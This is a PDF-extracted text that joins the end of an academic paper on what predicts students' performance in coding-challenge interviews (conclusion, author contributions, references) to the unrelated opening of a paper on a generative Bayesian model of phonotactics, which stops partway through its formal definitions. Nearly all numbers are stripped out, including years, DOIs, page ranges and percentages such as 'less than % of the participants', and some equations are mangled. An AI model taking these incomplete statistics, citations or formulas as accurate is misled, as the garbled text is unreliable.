they would perform better at some other point in time. this would minimize the chance of rejecting actually well fitting candidates who performed badly due to disadvantageous affective states. if a company is in the fortunate situation of having more applicants for a position than the company can assess via on-site interviews using coding challenges, then academic wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. performance, i.e., gpa and the data structures and algorithms course grade, are good criteria for preselecting candidates based on their resume. gpa is already frequently used as biographical data item for screening applicants as for recruiters, the gpa represents personal motivation as well as language and mathematical capacities (brown & campion, ). a better gpa results in more first choices and even the decision to list the gpa as biographical information on a resume will do so (thoms et al., ). our results imply that there is nothing wrong with that with respect to the intention of selecting appropriate candidates for more expensive on-site coding challenge interviews based on their academic performance. from a candidate’s point of view, acquiring knowledge on data structures and algorithms is beneficial for both better course gradings and a better coding challenge performance. our results further imply that programming experience is also a good criterion for preselecting candidates. although programming experience in years is something which is usually not directly stated on a resume, experience can be derived from several other resume items. for example, mcdowell ( ) advises to build and contribute to projects because having them on the resume ‘‘is often the best way to present yourself as more experienced. this is especially true for college students or recent grads’’ (p. ). we do not feel that our results indicate to which extent coding challenges are an effective tool for interviewing or even pre-screening job applicants. as we explain in the ‘limitations’ section, we ended up with a situation of less than % of the participants performing well overall and only less than % of them (one participant) being a top performer. coding challenges are capable of filtering out many candidates. while we welcome future studies to investigate whether coding challenges are an effective tool for candidate selection, we urge companies to bear in mind that an absolute score in a coding challenge should not be the only decisive factor in finding good candidates. conclusion the ability to be a successful coding challenge solver is essential in many technical interviews. yet little research has been conducted on predictor variables for a candidate’s performance, which results in a failure to understand why some people perform better than others in solving coding challenges and ultimately biases hiring decisions. this paper started to fill this research gap by investigating individual characteristics of successful coding challenge solvers. we reported on an exploratory study towards a theory for predicting the coding challenge performance with four constructs, namely happiness, personality, academic performance and experience. it became evident that the affective state sad as well as the personality trait of conscientiousness negatively correlate with the coding challenge performance. gpa, the data structures and algorithms course grade, as well as the programming experience in years positively correlated with the performance. recruiters and interviewers can take these findings into account when they screen resumes and decide for coding challenges as a means for measuring a candidate’s skills. being aware of possible predictor variables can reduce hiring costs and bias in hiring decisions by taking suitable measures as we discussed earlier in this work. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as we observed a difference between some of our results and the results of previous studies on the relationship between individual characteristics and software development performance, we speculate that coding challenges constitute an atypical programming task. we offer our observations for future studies to better understand them. moreover, we offer the theory to be tested in future work. due to the exploratory nature of our study, the observed relationships can be used to establish hypotheses which future work can test. the theory can then be extended, for example, by further individual characteristics and by contextual factors. taking some of the limitations into consideration, future studies can be designed to be more similar to technical interviews and could conduct such a study with prepared candidates to see how the results differ. finally, obtaining causal explanations for the relationships might enable the theory to be classified as a theory for explanation and prediction. a better understanding of the underlying causes allows sound recommendations for actions to be made which practitioners can benefit from in the future. acknowledgements we gratefully acknowledge the students who took the time to participate in our study and kornelia kuhle for proofreading the work. additional information and declarations funding daniel graziotin was supported by the alexander von humboldt (avh) foundation. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: alexander von humboldt (avh) foundation. competing interests the authors declare there are no competing interests. author contributions • marvin wyrich conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • daniel graziotin conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. • stefan wagner conceived and designed the experiments, contributed reagents/material- s/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the raw, anonymized data and the data analysis of the study are available in the supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abdalkareem r, shihab e, rilling j. . what do developers use the crowd for? a study using stack overflow. ieee software ( ): – doi . /ms. . . acuña st, gómez m, juristo n. . how do personality, team processes and task characteristics relate to job satisfaction and software quality? information and software technology ( ): – doi . /j.infsof. . . . baylor university. . icpc history—the world champions. available at http: //archive.is/yomfp. behroozi m, lui a, moore i, ford d, parnin c. . dazed: measuring the cognitive load of solving technical interview problems at the whiteboard. in: proceedings of the th international conference on software engineering: new ideas and emerging results, icse-nier ’ . new york: acm, – . bell d, hall t, hannay je, pfahl d, acuna st. . software engineering group work: personality, patterns and performance. in: sigmis cpr proceedings of the acm sigmis computer personnel research conference. software engineering group work: personality, patterns and performance. new york: acm, – . bloomfield a, sotomayor b. . a programming contest strategy guide. in: proceed- ings of the th acm technical symposium on computing science education. new york: acm, – . borreguero f, di nitto e, stebliuk d, tamburri da, zheng c. . fathoming software evangelists with the d-index. in: proceedings of the eighth international workshop on cooperative and human aspects of software engineering. piscataway: ieee press, – . bradburn nm. . the structure of psychological well-being. chicago: aldine publish- ing company. brown bk, campion ma. . biodata phenomenology: recruiters’ perceptions and use of biographical information in resume screening. journal of applied psychology ( ): doi . / - . . . . burton ba, hiron m. . creating informatics olympiad tasks: exploring the black art. olympiads in informatics : – . capretz lf, ahmed f. . why do we need personality diversity in software engineer- ing? acm sigsoft software engineering notes ( ): – . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /j.infsof. . . http://archive.is/yomfp http://archive.is/yomfp http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /peerj-cs. corno g, molinari g, baños rm. . assessing positive and negative experiences: validation of a new measure of well-being in an italian population. rivista di psichiatria ( ): – doi . / . . cruz s, da silva fq, capretz lf. . forty years of research on personality in software engineering: a mapping study. computers in human behavior : – doi . /j.chb. . . . dagienė v, futschek g. . bebras international contest on informatics and com- puter literacy: criteria for good tasks. in: international conference on informatics in secondary schools-evolution and perspectives. springer, – . darcy dp, ma m. . exploring individual characteristics and programming perfor- mance: implications for programmer selection. in: system sciences, . hicss’ . proceedings of the th annual hawaii international conference on. piscataway: ieee, a– a. demarco t, lister t. . peopleware: productive projects and teams. boston: addison- wesley. diener e, wirtz d, tov w, kim-prieto c, choi d-w, oishi s, biswas-diener r. . new well-being measures: short scales to assess flourishing and positive and negative feelings. social indicators research ( ): – doi . /s - - -y. digman jm. . personality structure: emergence of the five-factor model. annual review of psychology ( ): – doi . /annurev.ps. . . . du plessis ga, guse t. . validation of the scale of positive and negative expe- rience in a south african student sample. south african journal of psychology ( ): – doi . / .. dumitru. . how to find a solution—topcoder. available at http://archive.is/aqmhr. evans ge, simkin mg. . what best predicts computer proficiency? communications of the acm ( ): – doi . / . . ford d, barik t, rand-pickett l, parnin c. . the tech-talk balance: what technical interviewers expect from technical candidates. in: proceedings of the th interna- tional workshop on cooperative and human aspects of software engineering. piscataway: ieee press, – . ghory i. . using fizzbuzz to find developers who grok coding. available at http: //archive.is/fgzkg. golding p, facey-shaw l, tennant v. . effects of peer tutoring, attitude and personality on academic performance of first year introductory programming students. in: frontiers in education conference, th annual. piscataway: ieee, – . google inc. . google code jam. available at http://archive.is/yg kb. google inc. . re:work—guide: shape the candidate experience. available at http: //archive.is/txtot. graziotin d, fagerholm f, wang x, abrahamsson p. . on the unhappiness of software developers. in: proceedings of the st international conference on evaluation and assessment in software engineering—ease . new york: acm press. wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /annurev.ps. . . http://dx.doi.org/ . / . http://archive.is/aqmhr http://dx.doi.org/ . / . http://archive.is/fgzkg http://archive.is/fgzkg http://archive.is/yg kb http://archive.is/txtot http://archive.is/txtot http://dx.doi.org/ . /peerj-cs. graziotin d, fagerholm f, wang x, abrahamsson p. . what happens when software developers are (un)happy. journal of systems and software : – doi . /j.jss. . . . graziotin d, wang x, abrahamsson p. . happy software developers solve problems better: psychological measurements in empirical software engineering. peerj :e doi . /peerj. . graziotin d, wang x, abrahamsson p. . how do you feel, developer? an explana- tory theory of the impact of affects on programming performance. peerj computer science :e doi . /peerj-cs. . gregor s. . the nature of theory in information systems. mis quarterly ( ): – . haybron dm. . happiness and pleasure. philosophy and phenomenological research ( ): – doi . /j. - . .tb .x. haybron dm. . on being happy or unhappy. philosophy and phenomenological research ( ): – doi . /j. - . .tb .x. johnson p, ekstedt m. . the tarpit—a general theory of software engineering. information and software technology : – . johnson p, ekstedt m, jacobson i. . where’s the theory for software engineering? ieee software ( ): – . johnson p, jacobson i, goedicke m, kajko-mattsson m. . nd semat workshop on a general theory of software engineering (gtse ). in: proceedings of the international conference on software engineering. piscataway: ieee, – . jovanović v. . beyond the panas: incremental validity of the scale of positive and negative experience (spane) in relation to well-being. personality and individual differences : – doi . /j.paid. . . . kajko-mattsson m. . software engineering suffers from the beehive syndrome. in: information science and digital content technology (icidt). piscataway: ieee, – . karimi z, baraani-dastjerdi a, ghasem-aghaee n, wagner s. . links between the personalities, styles and performance in computer programming. journal of systems and software : – doi . /j.jss. . . . kemkes g, vasiga t, cormack g. . objective scoring for computing competition tasks. in: international conference on informatics in secondary schools—evolution and perspectives. berlin, heidelberg: springer, – . kumar v, pedanekar n. . mining shapes of expertise in online social q&a commu- nities. in: proceedings of the th acm conference on computer supported cooperative work and social computing companion. new york: acm, – . lang fr, lüdtke o, asendorpf jb. . testgüte und psychometrische Äquivalenz der deutschen version des big five inventory (bfi) bei jungen, mittelalten und alten erwachsenen. diagnostica ( ): – doi . // - . . . . layman l. . changing students’ perceptions: an analysis of the supplementary benefits of collaborative software development. in: th conference on software engineering education and training (cseet ). piscataway: ieee, – . leetcode. . leetcode. available at https://leetcode.com/ . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.paid. . . http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . // - . . . https://leetcode.com/ http://dx.doi.org/ . /peerj-cs. li f, bai x, wang y. . the scale of positive and negative experience (spane): psychometric properties and normative data in a large chinese sample. plos one ( ):e doi . /journal.pone. . matturro g. . soft skills in software engineering: a study of its demand by software companies in uruguay. in: th international workshop on cooperative and human aspects of software engineering (chase). piscataway: ieee, – . mccrae rr, costa pt. . reinterpreting the myers-briggs type indicator from the perspective of the five-factor model of personality. journal of personality ( ): – doi . /j. - . .tb .x. mccrae rr, john op. . an introduction to the five-factor model and its applica- tions. journal of personality ( ): – doi . /j. - . .tb .x. mcdowell gl. . what are gayle laakmann mcdowell’s favorite questions to ask in a software engineering interview, and what does she look for in evaluating the candidate’s performance? available at https://archive.is/n rd. mcdowell gl. . cracking the coding interview— programming questions and solutions. th edition. palo alto: careercup. mcdowell gl. . what is a typical software engineering interview with you like? available at http://archive.is/hr jl. merriam-webster. . the merriam-webster dictionary new edition (c) . springfield: merriam-webster, inc., . mongan j, kindler ns, giguère e. . programming interviews exposed: secrets to landing your next job. hoboken: john wiley & sons. murray j. . likert data: what to use, parametric or non-parametric? international journal of business and social science ( ): – . mäntylä mv, petersen k, lehtinen toa, lassenius c. . time pressure: a controlled experiment of test case development and requirements review. in: jalote p, briand l, hoek avd, eds. proceedings of the th international conference on software engineering, icse . new york: acm press, – . neuroskeptic. . p-values and exploratory research. discover magazine. [blog post] available at http://blogs.discovermagazine.com/neuroskeptic/ / / /p-values- and-exploratory-research/#.xema s lhe. oswald aj, proto e, sgroi d. . happiness and productivity. journal of labor economics ( ): – doi . / . pal a, harper fm, konstan ja. . exploring question selection bias to identify experts and potential experts in community question answering. acm transactions on information systems ( ): – doi . / . . pittenger dj. . measuring the mbti... and coming up short. journal of career planning and employment ( ): – . rahm t, heise e, schuldt m. . measuring the frequency of emotionsvalidation of the scale of positive and negative experience (spane) in germany. plos one ( ):e doi . /journal.pone. . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . .tb .x https://archive.is/n rd http://archive.is/hr jl http://blogs.discovermagazine.com/neuroskeptic/ / / /p-values-and-exploratory-research/#.xema s lhe http://blogs.discovermagazine.com/neuroskeptic/ / / /p-values-and-exploratory-research/#.xema s lhe http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. rahman mm, roy ck. . an insight into the pull requests of github. in: devanbu p, kim s, pinzger m, eds. the th working conference. an insight into the pull requests of github. new york: acm press, – . ralph p, johnson p, jordan h. . report on the first semat workshop on general theory of software engineering (gtse ). acm sigsoft software engineering notes ( ): – doi . / . . revilla ma, manzoor s, liu r. . competitive learning in informatics: the uva online judge experience. olympiads in informatics : – . rubin m. . do p values lose their meaning in exploratory analyses? it depends how you define the familywise error rate. review of general psychology ( ): doi . /gpr . russell ja. . core affect and the psychological construction of emotion. psychological review ( ): – doi . / - x. . . . sackman h, erikson wj, grant ee. . exploratory experimental studies comparing online and offline programming performance. communications of the acm ( ): – doi . / . . scacchi w. . understanding software productivity. in: software engineering and knowledge engineering: trends for the next decade. singapore: world scientific, – . shoaib l, nadeem a, akbar a. . an empirical evaluation of the influence of human personality on exploratory software testing. in: inmic : ieee th international multitopic conference. an empirical evaluation of the influence of human personality on exploratory software testing. piscataway: ieee, – . siegmund j, kstner c, liebig j, apel s, hanenberg s. . measuring and modeling programming experience. empirical software engineering ( ): – doi . /s - - - . silva aj, caetano a. . validation of the flourishing scale and scale of positive and negative experience in portugal. social indicators research ( ): – doi . /s - - -y. singh k. . quantitative social research methods. new delhi: sage. steinmayr r, meißner a, weidinger af, wirthwein l. . academic achievement. in: meyer lh, ed. oxford bibliographies online: education. new york: oxford university press. sumi k. . reliability and validity of japanese versions of the flourishing scale and the scale of positive and negative experience. social indicators research ( ): – doi . /s - - - . teles vm, de oliveira cet. . reviewing the curriculum of software engineering undergraduate courses to incorporate communication and interpersonal skills teaching. in: null. piscataway: ieee, . thoms p, mcmasters r, roberts mr, dombkowski da. . resume characteristics as predictors of an invitation to interview. journal of business and psychology ( ): – doi . /a: . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /gpr http://dx.doi.org/ . / - x. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. urness t. . using interview questions as short-term programming assignments in cs . journal of computing sciences in colleges ( ): – . wohlin c, Šmite d, moe nb. . a general theory of software engineering: bal- ancing human, social and organizational capitals. journal of systems and software : – doi . /j.jss. . . . yilmaz m, o’connor rv, colomo-palacios r, clarke p. . an examination of personality traits and how they impact on software development teams. information and software technology : – doi . /j.infsof. . . . wyrich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /peerj-cs. a generative model of phonotactics richard futrell brain and cognitive sciences massachusetts institute of technology futrell@mit.edu adam albright department of linguistics massachusetts institute of technology albright@mit.edu peter graff intel corporation graffmail@gmail.com timothy j. o’donnell department of linguistics mcgill university timothy.odonnell@mcgill.ca abstract we present a probabilistic model of phono- tactics, the set of well-formed phoneme se- quences in a language. unlike most compu- tational models of phonotactics (hayes and wilson, ; goldsmith and riggle, ), we take a fully generative approach, model- ing a process where forms are built up out of subparts by phonologically-informed struc- ture building operations. we learn an inven- tory of subparts by applying stochastic memo- ization (johnson et al., ; goodman et al., ) to a generative process for phonemes structured as an and-or graph, based on con- cepts of feature hierarchy from generative phonology (clements, ; dresher, ). subparts are combined in a way that allows tier-based feature interactions. we evaluate our models’ ability to capture phonotactic dis- tributions in the lexicons of languages drawn from the wolex corpus (graff, ). our full model robustly assigns higher proba- bilities to held-out forms than a sophisticated n-gram model for all languages. we also present novel analyses that probe model be- havior in more detail. introduction people have systematic intuitions about which se- quences of sounds would constitute likely or un- likely words in their language: although blick is not an english word, it sounds like it could be, while bnick does not (chomsky and halle, ). such in- tuitions reveal that speakers are aware of the restric- tions on sound sequences which can make up possi- ble morphemes in their language—the phonotactics of the language. phonotactic restrictions mean that each language uses only a subset of the logically, or even articulatorily, possible strings of phonemes. admissible phoneme combinations, on the other hand, typically recur in multiple morphemes, lead- ing to redundancy. it is widely accepted that phonotactic judgments may be gradient: the nonsense word blick is better as a hypothetical english word than bwick, which is better than bnick (hayes and wilson, ; al- bright, ; daland et al., ). to account for such graded judgements, there have been a vari- ety of probabilistic (or, more generally, weighted) models proposed to handle phonotactic learning and generalization over the last two decades (see da- land et al. ( ) and below for review). how- ever, inspired by optimality-theoretic approaches to phonology, the most linguistically informed and suc- cessful such models have been constraint-based— formulating the problem of phonotactic generaliza- tion in terms of restrictions that penalize illicit com- binations of sounds (e.g., ruling out ∗bn-). in this paper, by contrast, we adopt a generative approach to modeling phonotactic structure. our approach harkens back to early work on the sound structure of lexical items which made use of mor- pheme structure rules or conditions (halle, ; stanley, ; booij, ; rasin and katzir, ). such approaches explicitly attempted to model the transactions of the association for computational linguistics, vol. , pp. – , . action editor: eric fosler-lussier. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. redudancy within the set of allowable lexical forms in a language. we adopt a probabilistic version of this idea, conceiving of the phonotactic system as the component of the linguistic system which gen- erates the phonological form of lexical items such as words and morphemes. our system learns in- ventories of reusable phonotactically licit structures from existing lexical items, and assembles new lex- ical items by combining these learned phonotac- tic patterns using phonologically plausible structure- building operations. thus, instead of modeling phonotactic generalizations in terms of constraints, we treat the problem as a problem of learning lan- guage specific inventories of phonological units and language specific biases on how these phones are likely to be combined. although there have been a number of earlier gen- erative models of phonotactic structure (see sec- tion ) these models have mostly used relatively simplistic or phonologically implausible representa- tions of phones and phonological structure-building. by contrast, our model is built around three repre- sentational assumptions inspired by the generative phonology literature. first, we capture sparsity in the space of feature-specifications of phonemes by using feature dependency graphs—an idea inspired by work on feature geometries and the contrastive hierarchy (clements, ; dresher, ). sec- ond, our system can represent phonotactic general- izations not only at the level of fully specified seg- ments, but also allows the storage and reuse of sub- segments, inspired by the autosegments and class nodes of autosegmental phonology. finally, also in- spired by autosegmental phonology, we make use of a structure-building operation which is senstitive to tier-based contextual structure. to model phonotactic learning, we make use of tools from bayesian nonparametric statistics. in par- ticular, we make use of the notion of lexical mem- oization (?; goodman et al., ; wood et al., ; o’donnell, )—the idea that language- specific generalizations can be captured by the stor- age and reuse of frequent patterns from a linguisti- ultimately, we conceive of phonotactics as the module of phonology which generates the underlying forms of lexical items, which are then subject to phonological transformations (i.e., transductions). in this work, however, we do not attempt to model transformations from underlying to surface forms. cally universal inventory. in our case, this amounts to the idea that an inventory of segments and sub- segments can be acquired by a learner that stores and reuses commonly occuring segments in partic- ular, phonologically relevant contexts. in short, we view the problem of learning the phoneme inven- tory as one of concentrating probability mass on the segments which have been observed before, and the problem of phonotactic generalization as learning which (sub-)segments are likely in particular tier- based phonological contexts. model motivations in this section, we give an overview of how our model works and discuss the phenomena and the- oretical ideas that motivate it. . feature dependency graphs most formal models of phonology posit that seg- ments are grouped into sets, known as natural classes, that are characterized by shared articulatory and acoustic properties, or phonological features (trubetzkoy, ; jakobson et al., ; chomsky and halle, ). for example, the segments /n/ and /m/ are classified with a positive value of a nasal- ity feature (i.e., nasality:+). similarly, /m/ and /p/ can be classified using the labial value of a place feature, place:labial. these features al- low compact description of many phonotactic gen- eralizations. from a probabilistic structure-building perspec- tive, we need to specify a generative procedure which assembles segments out of parts defined in terms of these features. in this section, we will build up such a procedure starting from the simplest possi- ble procedure and progressing towards one which is more phonologically informed. we will clarify the for compatibility with the data sources used in evaluation (section . ), the feature system we use here departs in several ways from standard feature sets: ( ) we use multivalent rather than binary-valued features. ( ) we represent manner with a single feature, which has values such as vocalic, stop, and fricative. this approach allows us to refer to manners more compactly than in systems that employ combinations of features such as sonorant, continuant, and consonantal. for example, rather than referring to vowels as ‘non-syllabic’, we refer to them using feature value vocalic for the feature manner. generative process here using an analogy to pcfgs, but this analogy will break down in later sections. the simplest procedure for generating a seg- ment from features is to specify each feature independently. for example, consider the set of feature-value pairs for /t/: {nasality:-, place:alveolar, ...}. in a naive generative pro- cedure, one could generate an instance of /t/ by inde- pendently choosing values for each feature in the set {nasality, place, ...}. we express this process using the and-or graph notation below. box-shaped nodes—called or-nodes—represent features such as nasality, while circular nodes represent groups of features whose values are chosen independently and are called and-nodes. nasality ... place this generative procedure is equivalent (ignoring or- der) to a pcfg with rules: segment → nasality ... place nasality → + nasality → - place → bilabial place → alveolar ... not all combinations of feature-value pairs cor- respond to possible phonemes. for example, while /l/ is distinguished from other consonants by the feature lateral, it is incoherent to specify vow- els as lateral. in order to concentrate probabil- ity mass on real segments, our process should opti- mally assign zero probability mass to these incoher- ent phonemes. we can avoid specifying a lateral feature for vowels by structuring the generative pro- cess as below, so that the lateral or-node is only reached for consonants: vocalic a lateral ... b height ... consonant vowel beyond generating well-formed phonemes, a ba- sic requirement of a model of phonotactics is that it concentrates mass only on the segments in a par- ticular language’s segment inventory. for exam- ple, the model of english phonotactics should put zero or nominal mass on any sequence containing the segment /x/, although this is a logically possi- ble phoneme. so our generative procedure for a phoneme must be able to learn to generate only the licit segments of a language, given some probabil- ity distributions at the and- and or-nodes. for this task, independently sampling values at and-nodes does not give us a way to rule out particular com- binations of features such as those forming /x/. our approach to this problem uses the idea of stochastic memoization (or adaptation), in which the results of certain computations are stored and may be probabilistically reused “as wholes,” rather than recomputed from scratch (michie, ; goodman et al., ). this technique has been applied to the problem of learning lexical items at various levels of linguistic structure (de marcken, ; johnson et al., ; goldwater, ; o’donnell, ). given our model so far, applying stochastic memo- ization is equivalent to specifying an adaptor gram- mar over the pcfgs described so far. let f be a stochastic function which samples feature values using the and-or graph representa- tion described above.we apply stochastic memo- ization to each node. following johnson et al. ( ) and goodman et al. ( ), we use a distri- bution for probabilistic memoization known as the dirichlet process (dp) (ferguson, ; sethura- man, ). let mem{f} be a dp-memoized ver- sion of f. the behavior of a dp-memoized function can be described as follows. the first time we invoke mem{f}, the feature specification of a new segment will be sampled using f. on subsequent invocations, we either choose a value from among the set of pre- vious sampled values (a memo draw), or we draw a new value from f (a base draw). the probability of sampling the ith old value in a memo draw is ni n+θ , where n is the number of tokens sampled so far, ni is the number of times that value i has been used in the past, and θ > is a parameter of the model. a base draw happens with probability θ n+θ . this pro- cess induces a bias to reuse items from f which have been frequently generated in the past. we apply mem recursively to the sampling proce- dure for each node in the feature dependency graph. the more times that we use some particular set of features under a node to generate words in a lan- guage, the more likely we are to reuse that set of features in the future in a memo draw. this dynamic leads our model to rapidly concentrate probability mass on the subset of segments which occur in the inventory of a language. . class node structure our use of and-or graphs and lexical memoiza- tion to model inter-feature dependencies is in- spired by work in phonology on distinctiveness and markedness hierarchies (kean, ; berwick, ; dresher, ). in addition to using feature hierarchies to delineate possible segments, the liter- ature has used these structures to designate bundles of features that have privileged status in phonolog- ical description, i.e. feature geometries (clements, ; halle, ; mccarthy, ). for example, many analyses group features concerning laryngeal states (e.g., voice, aspiration, etc.) under a la- ryngeal node, which is distinct from the node con- taining oral place-of-articulation features (clements and hume, ). these nodes are known as class nodes. in these analyses, features grouped together under the laryngeal class node may covary while be- ing independent of features grouped under the oral class node. the lexical memoization technique discussed above captures this notion of class node directly, be- cause the model learns an inventory of subsegments under each node. consider the feature dependency graph below. a b nasality voice ... vocalic c backness height ... ... consonantvowel in this graph, the and-node a generates fully spec- ified segments. and-node b can be thought of as generating the non-oral properties of a segment, in- cluding voicing and nasality. and-node c is a class node bundling together the oral features of vowel segments. the features under b are outside of the vo- calic node, so these features are specified for both consonant and vowel segments. this allows combinations such as voiced nasal consonants, and also rarer combinations such as unvoiced nasal vow- els. because all and-nodes are recursively memo- ized, our model is able to bind together particular non-oral choices (node b), learning for instance that the combination {nasality:+, voiced:+} com- monly recurs for both vowels and consonants in a language. that is, {nasality:+, voiced:+} be- comes a high-probability memo draw. since the model learns an inventory of fully spec- ified segments at node a, the model could learn one- off exceptions to this generalization as well. for example, it could store at a high level a segment with {nasality:+, voiced:-} along with some other features, while maintaining the generalization that {nasality:+, voiced:+} is highly frequent in base draws. language-specific phoneme invento- ries abound with such combinations of class-node- based generalizations and idiosyncrasies. by using lexical memoization at multiple different levels, our model can capture both the broader generalizations described in class node terminology and the excep- tions to those generalizations. . sequential structure as memoization in context in section . , we focused on the role that features play in defining a language’s segment inventory. we gave a phonologically-motivated generative process, equivalent to an adaptor grammar, for phonemes in isolation. however, features also play an im- portant role in characterizing licit sequences. we model sequential restrictions as context-dependent segment inventories. our model learns a distribution over segments and subsegments conditional on each preceding sequence of (sub)segments, using lexi- cal memoization. introducing context-dependence means that the model can no longer be formulated as an adaptor grammar. . tier-based interaction one salient property of sequential restrictions in phonotactics is that segments are often required to bear the same feature values as nearby segments. for example, a sequence of a nasal and a follow- ing stop must agree in place features at the end of a morpheme in english. such restrictions may even be non-local. for example, many languages pre- fer combinations of vowels that agree in features such as height, backness, or rounding, even figure : tiers defined by class nodes a and b for context sequence /ak/. see text. across arbitrary numbers of intervening consonants (i.e., vowel harmony). one way to describe these sequential feature in- teractions is to assume that feature values of one segment in a word depend on values for the same or closely related features in other segments. this is accomplished by dividing segments into subsets (such as consonants and vowels), called tiers, and then making a segment’s feature values preferen- tially dependent on the values of other segments on the same tier. such phonological tiers are often identified with class nodes in a feature dependency graph. for example, a requirement that one vowel identically match the vowel in the preceding syllable would be stated as a requirement that the vowel’s height, backness, and rounding features match the val- ues of the preceding vowel’s features. in this case, the vowels themselves need not be adjacent—by as- suming that vowel quality features are not present in consonants, it is possible to say that two vowels are adjacent on a tier defined by the nodes height, backness, and rounding. our full generative process for a segment follow- ing other segments is the following. we follow the example of the generation of a phoneme conditional on a preceding context of /ak/, shown with simpli- fied featural specifications and tiers in figure . at each node in the feature dependency graph, we can either generate a fully-specified subsegment for that node (memo draw), or assemble a novel subseg- ment for that node out of parts defined by the fea- ture dependency graph (base draw). starting at the root node of the feature dependency graph, we de- cide whether to do a memo draw or base draw con- ditional on the previous n subsegments at that node. so in order to generate the next segment follow- ing /ak/ in the example, we start at node a in the next draw from the feature geometry, with some probabil- ity we do a memo draw conditioned on /ak/, defined by the red tier. if we decide to do a base draw in- stead, we then repeat the procedure conditional on the previous n − segments, recursively until we are conditioning on the empty context. that is, we do a memo draw conditional on /k/, or conditional on the empty context. this process of conditioning on successively smaller contexts is a standard tech- nique in bayesian nonparametric language modeling (teh, ; goldwater et al., ). at the empty context, if we decide to do a base draw, then we generate a novel segment by repeat- ing the whole process at each child node, to gen- erate several subsegments. in the example, we would assemble a phoneme by independently sam- pling subsegments at the nasal/laryngeal node b and the manner node, and then combining them. cru- cially, the conditioning context consists only of the values at the current node in the previous phonemes. so when we sample a subsegment from node b, it is conditional on the previous two values at node b, { voice:+, nasal:-} and { voice:-, nasal:-}, defined by the blue tier in the figure. the process continues down the feature dependency graph recur- sively. at the point where the model decides on vowel place features such as height and backness, these will be conditioned only on the vowel places features of the preceding /a/, with /k/ skipped en- tirely as it does not have values at vowel place nodes. this section has provided motivations and a walk- through of our proposed generative procedure for se- quences of segments. in the next section, we give the formalization of the model. formalization of the models here we give a full formal description of our pro- posed model in three steps. first, in section . , we formalize the generative process for a segment in isolation. second, in section . , we give for- mulation of bayesian nonparametric n-gram mod- els with backoff. third, in section . , we show how to drop the generative process for a phoneme into the n-gram model such that tier-based interac- tions emerge naturally. . generative process for a segment a feature dependency graph g is a fully connected, singly rooted, directed, acyclic graph given by the triple 〈v,a,t,r〉 where v is a set of vertices or nodes, a is a set of directed arcs, t is a total function t(n) : v → {and,or}, and r is a distinguished root node in v . a directed arc is a pair 〈p,c〉 where the parent p and child c are both elements in v . the function t(n) identifies whether n is an and- or or- node. define ch(n) to be the function that returns all children of node n, that is, all n′ ∈ n such that 〈n,n′〉 ∈ a. a subgraph gs of feature dependency graph g is the graph obtained by starting from node s by re- taining only nodes and arcs reachable by traversing arcs starting from s. a subsegment ps is a subgraph rooted in node s for which each or-node contains ex- actly one outgoing arc. subsegments represent sam- pled phone constituents. a segment is a subsegment rooted in r—that is, a fully specified phoneme. the distribution associated with a subgraph gs is given by gs below. gs is a distribution over sub- segments; the distribution for the full graph gr is a distribution over fully specified segments. we oc- casionally overload the notation such that gs(ps) will refer to the probability mass function associated with distribution gs evaluated at the subsegment ps. hs ∼ dp(θs,gs) ( ) gs(ps) =    ∏ s′∈ch(s) h s′ (p s′ ) t(s) = and ∑ s′∈ch(s) ψ s s′h s′ (p s′ ) t(s) = or the first case of the definition covers and-nodes. we assume that the leaves of our feature dependency graph—which represent atomic feature values such as the laryngeal value of a place feature—are childless and-nodes. the second case of the definition covers or-nodes in the graph, where ψss′ is the probability associated with choosing outgoing arc 〈s,s′〉 from parent or- node s to child node s′. thus, or-nodes define mix- ture distributions over outgoing arcs. the mixture weights are drawn from a dirichlet process. in par- ticular, for or-node n in the underlying graph g, the vector of probabilities over outgoing edges is dis- tributed as follows. ~ψs ∼ dp(θs, uniform(|ch(s)|)) note that in both cases the distribution over child subgraphs is drawn from a dirichlet process, as be- low, capturing the notion of subsegmental storage discussed above. . 